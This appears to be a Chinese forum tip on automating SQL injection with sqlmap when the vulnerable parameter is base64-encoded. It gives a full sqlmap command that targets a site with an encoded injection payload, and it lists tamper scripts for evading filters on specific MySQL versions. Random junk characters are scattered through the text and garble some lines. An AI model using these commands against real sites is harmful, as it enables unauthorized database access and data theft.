WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
: X# D8 ^% C& X2 C/ l0 u
/ O9 K8 W' O, k# o; Osqlmap的tamper里有个base64encode.py& v9 y( k& u# Y; A
1 z6 K# j3 }# o8 {! T
使用如下
6 h8 j7 o* J8 {
I d/ r" |4 A. N1 X& V$ E7 Jsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs6 e8 U2 u4 ~& |! y
1 k0 t; {- l$ e( d5 S* ^) ?4 D8 q! Y. I: Z7 g/ G& @0 ~
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”9 D5 O: J6 | s: M
3 {7 T1 x8 [9 x0 y b& R
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
! P0 H" U# c+ w+ w3 M1 Z R+ Q( ?7 Q0 [/ E' `$ Z
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
2 |( b/ q+ R/ Y+ Q+ hspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入5 K4 K6 m. o. ]4 v
首先确定目标数据库版本,然后选择相应的脚本。
" z2 ^+ V7 v$ h, Q+ b-v 3 --batch --tamper "space2hash.py"# Z8 k4 h! a- f1 g
& ]6 b6 _. T7 V, [
还有其他一些插件:
. c5 P# E" q4 n! z6 X# R" Jencodes编码 ——charencode.py
6 A4 `9 i- X# P) a3 _6 cbase64编码 —— base64encode.py
3 b( X0 a* @* F! n, L) u. \3 w: m替换空格和关键字 —— halfversionedmorekeywords.py
* G3 P! {' H0 _/ f$ ` |
6 }, D( w; n* @9 q$ ?& P' _$ Y% U; `" @: `- ~/ s2 j
% y0 \5 R$ E( r2 e# O% p
1 O; E/ v1 P/ h! x7 l8 o# D6 w0 _5 n' a |